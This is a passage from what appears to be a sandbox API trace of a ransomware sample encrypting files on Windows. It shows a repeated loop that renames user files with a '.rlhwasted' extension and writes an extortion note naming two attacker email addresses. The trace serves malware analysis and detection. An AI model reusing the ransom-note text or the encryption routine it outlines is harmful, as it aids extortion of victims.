KEY:\r\n[begin_key]o3tVagncdgU70SfE7d9xbZNkJllzGgERouoGdnnv5E8Im763sIIfgodSk8Ay5lTv\r\nwyZ5jDHsr0vGIpo2G+0GSOtwGcuNUMs/3sevSO8eF6WSCGirNGWj/09S/a3xKQaj\r\niiZGD+pEHsxAa+3Ga1IodpqYvNKIx1e4WDc+UPzAj78/qbV7wBGx7IqHdVy/5/Fe\r\nUrE82xOUaH+tXtDecgeW4GKKJiVVvD0bG6WzrE4cvl23uUB+WNMux/0qq8uF16Yo\r\nSc0oEtiyUauypzVjR104JkBiEfvFOvAsYv1eEykXUL7xv5HnCUI6yvLpx4GQ4a0x\r\nCNwHh9wn9XieubJeHlcjDKfLYShIvMgIE3LlpAWhxb3yHbmrXARbxkl9eqQUhPai\r\nH8Z0w1uOWdwF7M6qVR6q4Q+5ULw0b2H6NntLTvqTz8APBoJR9yuWrOC9+z2/C24Y\r\nukdYgR2CpMYEpdAN1TCd6lf/dnLYpptk7I4sY6GS+C0h5tlvK8rK1p/MKaeFlK3r\r\nokk79PDFLsem18SHAlx3GU+uBnrVq/tQl11LtpyveXZNDaai9c8UteXH07VCLuW1\r\nngzQT+lBTSj8pnZbj9kXFTROm61f/+shVCgz3nQ79buANHJaQ+s+KOoYzqZaxwNA\r\nqQME0UMAlG1d/esUU6rfxTslkr6stgK1A5c7Bb+xE7C=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.721] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.721] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.721] SetEndOfFile (hFile=0x104) returned 1 [0198.725] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.725] CloseHandle (hObject=0x104) returned 1 [0198.769] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.769] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713310 | out: hHeap=0x6b0000) returned 1 [0198.769] _aulldvrm () returned 0x0 [0198.769] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0198.770] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.770] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.770] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0198.770] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x712fd0 [0198.770] lstrcpyW (in: lpString1=0x71306c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.770] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.770] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0198.771] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0198.771] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.772] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.772] SetEndOfFile (hFile=0x104) returned 1 [0198.773] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.773] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.773] lstrcpyW (in: lpString1=0x71306c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.rlhwasted")) returned 1 [0198.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0198.782] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0198.783] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0198.783] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0198.783] CloseHandle (hObject=0x128) returned 1 [0198.784] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.784] CloseHandle (hObject=0x10c) returned 1 [0198.784] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.784] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.785] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.785] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.785] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.786] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.786] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.794] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.794] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.794] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.795] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OWeXjdTUZXwVaai4S3Wy9lkCxwvSUeBgbJn8psG00DV4K5ZYHi4T5Nk49HE5aNgz\r\nHRLiG6as4OMX9GKtnjBnsWgwLl1GoVFpav6qOQHAVd803f312wv8bz132PctKRp5\r\nlCLFdXW5nTg95DSIzTRd97snbr6mmprK4Anp6B6iYewEtKLMUN3eBHgUY1t0Lzt6\r\nkCZtU301yjNhGV/OfisorWtPbs+OvpRk8nO54aIqh/P7JZC4xvxqO7XkGgOVA/1H\r\nUQ4mQ1YGyhTVBZ5FRJI4vox7r7nX9RKTC4OGnpmQ4fBPa+iKbMVMSFp6akRtOWbT\r\n6GW7H3q6i07Ck6+QIPDtcHaUWUHudDUf4qpW8T1q5g34VAryCctNJ5+QsSYwnZe1\r\n+6KBXbGnDC4lbinRxTJHYZONKX7Jg5NhgN6YH8LsgqKw1J2GafA6BIgBG2Ofitn3\r\nQlafQHU4zQEJahZgCknPF6xbtU5+XrqX3ZUPyhCOkkiemggMLYHSfXttDBkuzOiq\r\n8WcLpijk1l4cVRHVjBzAE0J2ipS4hXCXjKIJFPeh7UgHE5G4NAxJ3NbAK3+HuvV9\r\nJcQdIUKxGDicgbJGCWkgG/JyNvtY3eUxdVB+ZABV7AEpbPDtfjGzMWFruAlou1SW\r\n8bTZZ8QbRl0+3KDqdIGXEioSIGz2tUO/kAluECkHuUM=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.795] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.795] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.795] SetEndOfFile (hFile=0x104) returned 1 [0198.797] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.797] CloseHandle (hObject=0x104) returned 1 [0198.798] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.799] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fecf8 | out: hHeap=0x6b0000) returned 1 [0198.799] _aulldvrm () returned 0x0 [0198.799] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.800] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.800] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.800] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0198.800] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x712fd0 [0198.800] lstrcpyW (in: lpString1=0x71305e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.800] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.800] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.801] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.801] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.801] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.802] SetEndOfFile (hFile=0x104) returned 1 [0198.802] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.802] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.802] lstrcpyW (in: lpString1=0x71305e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.rlhwasted")) returned 1 [0198.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.804] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0198.804] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0198.804] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0198.805] CloseHandle (hObject=0x10c) returned 1 [0198.806] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.806] CloseHandle (hObject=0x128) returned 1 [0198.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.806] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0198.807] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.807] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.807] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0198.808] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.808] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.849] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.849] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.849] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.849] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PeP/BOXBmVGlOmVAT9sd0MhSdiqPd20PYbRvIHiXEQpeC9uTcZk36h8uAqIwJ2xc\r\nVK0Ly04lDuxN8Za34HXmPNfzlXpZx7gSK3RVeZ3ZZG7Mgo2s2tPrkc9Wh/0GwOaU\r\ncEN0ihkhTLItI+kqgVN0qwRpi8GhlM+FE7kvORRpLVlvWHsLx+pBBWkW1MjC6MvX\r\n56Du02CWSySiRjM6+KhWXfDxzIHVl1cHh00s3o5wFYbM0mMbsMym+ET2UM7Pwsxh\r\nROFrY1+Cly3DAsd3UZd5fgqvUB6qe1Umi7S4En9rma9QotHdYZEpb1cDxEwUJWeR\r\nxpTCZjvLnhigq8PFn+ztjLXxX9kOj0P5h0knF2wZ0cjYtA8F8Uc250JY6W+Asc/s\r\nsfNnKWJ3Q5KZCrUBNXLP4EhsUR/QuStOwXYhhnQu9I0NK2TpuB92igW5XLvW9Nzf\r\nx4X+r0XnIG+TSk5kwAtyoPtnT1QRVkJL4Md1G2bzu+bfvGsLvDwlW29ykTT3N1KY\r\nZRzD7J4bH2r/KbVxzQ1vWLOEzWXW3bUZyB+d6TdFV9FY7jumY7fsF07T/wXkls2t\r\nkFoeOkvHuuKfMLEsp8sc5jBbJqFv0gX0Nekca5nAFKLOAYlgT7q+U08bTRm/itJG\r\nqxlfQasU3NLQSjEhRPpCKOX+C7WfJA9396IJ73eY/9W=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.849] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.849] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.849] SetEndOfFile (hFile=0x104) returned 1 [0198.852] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.852] CloseHandle (hObject=0x104) returned 1 [0198.854] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.855] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b558 | out: hHeap=0x6b0000) returned 1 [0198.855] _aulldvrm () returned 0x0 [0198.855] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0198.855] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.855] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.856] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0198.856] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x712fd0 [0198.856] lstrcpyW (in: lpString1=0x71305a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.856] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0198.856] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0198.856] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0198.856] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.857] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.858] SetEndOfFile (hFile=0x104) returned 1 [0198.858] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.858] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0198.858] lstrcpyW (in: lpString1=0x71305a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.rlhwasted")) returned 1 [0198.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0198.895] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0198.896] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x86 [0198.896] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x86) returned 0x6a0000 [0198.896] CloseHandle (hObject=0x10c) returned 1 [0198.898] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0198.899] CloseHandle (hObject=0x128) returned 1 [0198.899] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0198.899] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0198.900] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0198.900] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.900] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0198.901] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0198.901] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.912] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0198.912] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0198.913] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.913] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IUOOvv4AllitqXVWalks/RgApyz5lgrTxtTELkHY2Ji5hXazUu7svw8T4ahRxoiN\r\n94TSY40f7yFrQ0RiSQdLLtqKqjwLFILbBHJEaZ+WQFIgBh8PibpmePGOw8JbWBMn\r\nD8XL7d1mbn8qsxe7DEYAgoD0fWaKi8ozwZyV7BwUEist8vHMWef/34jGoTEztWuf\r\nYo4FOu79hfe4oL71+vYhIFoQCQeiIz7PnwOClSp4ui8TdU69e46OJvz08hBnwdM3\r\n8rFJTzTnKT2cqu84rpaQ8WlhdK9HaMOB5KEsRnwhK3pdRzOkQ5b8f3p59XRTFddy\r\nbSSYVbMTxB1zsBTFOaZUhjnmlvg4Ww2LmcS4Ih/YS0vYmdKnkWZfRwidWbZoLFho\r\nkqstwzUF39es/2yiBkaZPpb2P6h7Ciali0p0qDcDT5psbOZlvufwDAqTJcipPQFo\r\nlvOfMWVX7Q/J0hWBdyTXp+E1r6wEiDW3/B78STosw9NpUZwUSUJeVO7nFjE1tJaN\r\nUP7W4XMKnxeQbMNQbz2McNgnfzj3HP9nBJ9V+7/FUIv2wG4g3yOZ4rckBCKBEpqb\r\nlXXYBvPvg9+zBJYxwcu8uAQ9SG3cmtQMvxs9fYPd0vtxtaqQeE+RWq8uW53ibAck\r\ndZNCsJyTA2ia9/RUHwC6ijfkFivGF3XJW/kSlS8Ioog=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.913] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.913] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0198.913] SetEndOfFile (hFile=0x104) returned 1 [0198.916] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.916] CloseHandle (hObject=0x104) returned 1 [0198.918] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0198.918] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b728 | out: hHeap=0x6b0000) returned 1 [0198.918] _aulldvrm () returned 0x0 [0198.918] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0198.919] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0198.919] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.919] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN 